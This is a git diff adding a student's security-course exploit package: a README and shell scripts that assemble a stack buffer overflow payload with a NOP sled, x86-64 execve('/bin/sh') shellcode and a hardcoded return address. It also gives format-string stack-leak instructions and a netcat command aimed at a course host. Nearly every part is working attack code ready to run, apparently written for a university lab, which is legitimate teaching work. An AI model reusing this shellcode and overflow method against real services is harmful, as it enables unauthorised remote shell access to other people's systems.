diff options
Diffstat (limited to 'CamilStaps-s4498062-Assignment-4/ex1/exploit')
| -rw-r--r-- | CamilStaps-s4498062-Assignment-4/ex1/exploit/README | 18 | ||||
| -rw-r--r-- | CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit | bin | 0 -> 561 bytes | |||
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh | 16 | ||||
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh | 16 | ||||
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh | 4 | ||||
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh | 9 | ||||
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh | 17 |
7 files changed, 80 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/README b/CamilStaps-s4498062-Assignment-4/ex1/exploit/README new file mode 100644 index 0000000..9e055de --- /dev/null +++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/README @@ -0,0 +1,18 @@ +Usage: ./exploit.sh | nc hackme.cs.ru.nl 2288 + +You start with control over input. Send EOF (ctrl+D) to send the exploit. Input control +is then returned to you. Note that the shell will not echo a prompt. Just try some commands. + +If the exploit does not function out of the box, use the initial control to send format +string (50 times %p). Get the desired return address from this (it's the 8 bytes before the +stored frame pointer, 16 bytes before the current return address, in "int ret", right behind +the buffer now recognizable by the run of 0x7025702570257025). Change the return address +in genretaddr.sh. Run genexploit.sh to generate the new exploit. Note that the return address +tends to drift, even with ASLR turned off. See genretaddr.sh for details. + +If the shellcode must be altered, do so in genshellcode.sh. If this also means the padding +must be altered, change the number of NOPs in genexploit.sh (the first loop). If necessary, +also alter the number of copies of the return address in genexploit.sh (the second loop). + +If you need more than a single try in one session (e.g. when ASLR is turned on), change +exploit.sh to use the commented loop instead of `cat - exploit -`. diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit Binary files differnew file mode 100644 index 0000000..4882996 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh new file mode 100755 index 0000000..3c21d53 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh @@ -0,0 +1,16 @@ +#!/bin/sh +cat exploit - + +# cat - exploit - is the "best" way of doing this: +# +# It lets you explore the target using format strings, so that you can +# craft your exploit into "exploit", execute it by sending EOF (ctrl+D), +# and then once again you have direct input options. +# +# Can also solve this with a looping construct, for when you need more +# than one try, e.g. +#while [ 1 ] +#do +# cat - +# cat exploit +#done diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh new file mode 100755 index 0000000..5d46c8f --- /dev/null +++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh @@ -0,0 +1,16 @@ +#!/bin/bash +./genretaddr.sh +./gennop.sh +./genshellcode.sh +for i in {1..434} +do + cat nop >> exploittmp +done +cat shellcode >> exploittmp +for i in {1..12} +do + cat retaddr >> exploittmp; +done +tr -d "\n" < exploittmp > exploit +echo >> exploit +rm shellcode retaddr nop exploittmp diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh new file mode 100755 index 0000000..e2b0fe7 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh @@ -0,0 +1,4 @@ +#!/bin/bash +echo -e "\x90" > nop + +# Could also use a sled of pushes but that changes the stack so less elegant.
\ No newline at end of file diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh new file mode 100755 index 0000000..1a741f2 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh @@ -0,0 +1,9 @@ +#!/bin/bash +echo -e "\x70\xe4\xff\xff\xff\x7f\x00\x00" > retaddr + +# 0x00007fffffffe470 + +# We've noticed that even with ASLR turned off, the correct return +# address can drift a few hundred bytes. We haven't determined a +# cause for this. Take this into consideration when creating, guiding +# and grading the assignment. diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh new file mode 100755 index 0000000..63fa491 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh @@ -0,0 +1,17 @@ +#!/bin/bash +echo -e "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" > shellcode + +# This shellcode translates as follows: +# +# "\x48\x31\xd2" // xor %rdx, %rdx +# "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx +# "\x48\xc1\xeb\x08" // shr $0x8, %rbx +# "\x53" // push %rbx +# "\x48\x89\xe7" // mov %rsp, %rdi +# "\x52" // push %rdx // There is an error in the "original", push %rax will push +# // some random stuff on the stack, instead of NULL, which will +# // cause the execve to fail with EFAULT (-14). See man execve. +# "\x57" // push %rdi +# "\x48\x89\xe6" // mov %rsp, %rsi +# "\xb0\x3b" // mov $0x3b, %al +# "\x0f\x05" // syscall
\ No newline at end of file |